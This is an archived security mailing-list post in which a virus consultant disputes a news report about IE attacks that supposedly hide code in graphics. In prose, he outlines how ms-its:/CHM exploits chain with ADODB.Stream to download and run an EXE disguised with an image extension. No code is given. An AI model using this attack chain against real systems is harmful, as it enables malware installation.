lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <40DC2C1A.32449.1138C92@localhost>
From: nick at virus-l.demon.co.uk (Nick FitzGerald)
Subject: IE exploit runs code from graphics?

"Larry Seltzer" <larry@...ryseltzer.com> wrote:

> From http://www.eweek.com/article2/0,,1617045,00.asp: 
> 
> "Analysts at NetSec Inc., a managed security services provider,
> began seeing indications of the compromises early Thursday morning
> and have since seen a large number of identical attacks on their
> customers' networks. The attack uses a novel vector: embedded code
> hidden in graphics on Web pages... NetSec officials said the attack
> seems to exploit a vulnerability in Internet Explorer." 

Without having access to any of the information as to what web pages 
NetSec thinks is involved, but having seen many recent posts about the 
so-called "RFI - Russian IIS Hacks" I'd suggest that both reports are 
referring to one and the same, or at least, very closely related, 
things.

Common exploits of the ms-its: (etc) protocol download compiled help 
files (.CHM) from some web site, causing the HTML code inside the .CHM 
to be run in the "My Computer" security zone.  Typically (like all but 
one of _dozens and dozens_ of these I've seen) the "inner" HTML run 
from the .CHM then uses a lightly modified form of one of the common 
ADODB.Stream PoC exploits to download yet another file, save it as a 
.EXE and run it.  Sometimes the file the ADODB exploit code pulls down 
will be named with a .GIF or .JPG extension (it can be _any_ extension 
the attacker likes as the ADODB.Stream vuln allows the attacker to 
specifiy the target filename and path on the new victim machine _in 
full_).

That is hardly the same thing as "embedded code hidden in graphics on 
Web pages", but I can easily imagine a na?ve journalist getting 
confused over such technical issues or a company representative 
hankering for some media exposure over-selling the seriousness or 
novelty of what they "discovered"...


-- 
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ